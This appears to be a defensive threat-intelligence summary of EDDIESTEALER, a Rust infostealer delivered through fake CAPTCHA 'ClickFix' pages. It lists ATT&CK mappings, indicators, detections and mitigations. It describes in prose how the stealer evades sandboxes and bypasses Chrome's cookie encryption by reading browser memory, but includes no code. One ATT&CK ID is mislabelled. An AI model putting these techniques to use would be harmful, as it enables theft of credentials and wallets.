Full Report
A new malware campaign is distributing a novel Rust-based information stealer dubbed EDDIESTEALER using the popular ClickFix social engineering tactic initiated via fake CAPTCHA verification pages. "This campaign leverages deceptive CAPTCHA verification pages that trick users into executing a malicious PowerShell script, which ultimately deploys the infostealer, harvesting sensitive data such as
Analysis Summary
# Tool/Technique: EDDIESTEALER
## Overview
EDDIESTEALER is a newly observed, commodity information stealer malware written in Rust. It is distributed via an elaborate social engineering scheme leveraging deceptive CAPTCHA verification pages (ClickFix tactic) which ultimately execute a PowerShell script to download and run the infostealer. Its primary purpose is to harvest sensitive data from infected hosts, including credentials, browser information, and cryptocurrency wallet details.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Windows (implied by PowerShell/cscript usage)
- Capabilities: Data exfiltration, C2 communication, anti-analysis, bypassing browser encryption mechanisms.
- First Seen: May 2025 (Inferred from related reporting context)
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Deployment via scripts initiated by social engineering)
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- T1027 - Obfuscated Files or Information (Implied by obfuscated PowerShell command)
- T1105 - Ingress Tool Transfer (Downloading secondary payloads)
- T1055 - Process Injection (Implied by incorporating ChromeKatz logic)
- T1474 - Data Staged
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- Gathers system metadata, cryptocurrency wallet details, browser information (passwords, cookies), FTP client data, and messaging application data.
- Receives dynamic tasks from a Command & Control (C2) server.
- Uses standard `kernel32.dll` functions (`CreateFileW`, `GetFileSizeEx`, `ReadFile`, `CloseHandle`) to read targeted files.
- Encrypts collected host information before exfiltrating via HTTP POST requests.
- Employs string encryption and a custom WinAPI lookup mechanism for resolving API calls.
- Mutex creation to ensure single instance execution.
### Advanced Features
- **Anti-Analysis/Evasion:** Contains checks to self-delete if executed in a sandboxed environment. Uses NTFS Alternate Data Streams renaming for self-deletion to bypass file locks.
- **Bypassing Chrome Encryption:** Implements a Rust version of **ChromeKatz** to bypass Chromium's app-bound encryption to access unencrypted sensitive data (like cookies) directly from memory.
- **Chrome Data Exfiltration Enhancement:** If the targeted Chromium browser is not running, it spawns a new, invisible browser instance positioned off-screen to read memory associated with the network service child process to extract credentials.
- **Headless Browser Interaction:** Launches Chrome processes with `--remote-debugging-port=[port]` to enable DevTools Protocol interaction in a headless manner.
- **Configuration Update:** Newer variants transmit host information proactively before receiving task configurations, and use a hard-coded encryption key instead of retrieving it dynamically.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: Pseudorandom 12-character file name (in Downloads folder)
- Registry Keys: [Not provided in the context]
- Network Indicators: C2 server located at `llll[.]fit` (defanged)
- Behavioral Indicators: Execution of obfuscated PowerShell via Windows Run dialog following deceptive CAPTCHA interaction; use of `cscript` to run downloaded JavaScript (`gverify.js`) hiddenly; attempts to read Chromium memory space using ChromeKatz logic.
## Associated Threat Actors
- [Not explicitly named, but associated with campaigns leveraging the ClickFix social engineering tactic.]
## Detection Methods
- Detection of initial JavaScript payload (`gverify.js`) execution by `cscript`.
- Detection of PowerShell commands initiating external connections and file downloads via the Run dialog.
- Signatures for the characteristic file name structure (12 random characters).
- Detection of memory scraping techniques targeting Chromium processes, especially those related to ChromeKatz implementation behaviors.
- Detection of mutex creation patterns specific to EDDIESTEALER.
## Mitigation Strategies
- User education against deceptive social engineering tactics like ClickFix, particularly avoiding pasting or running commands from untrusted sources into the Windows Run dialog.
- Monitor and restrict execution of PowerShell scripts downloaded via web browser user interaction.
- Implement sandboxing environments that effectively mask typical sandbox indicators to prevent self-deletion.
- Harden browser security and monitor for suspicious browser process spawning (e.g., new Chrome instances launched off-screen).
## Related Tools/Techniques
- **ClickFix:** The social engineering delivery technique used to initiate execution.
- **ChromeKatz (Rust implementation):** The specific technique/module used to bypass Chromium encryption.
- **Katz Stealer:** A related stealer family that also circumvents Chrome app-bound encryption, but via DLL injection.
- **Latrodectus:** Mentioned as exhibiting similar self-deletion techniques using NTFS Alternate Data Streams renaming.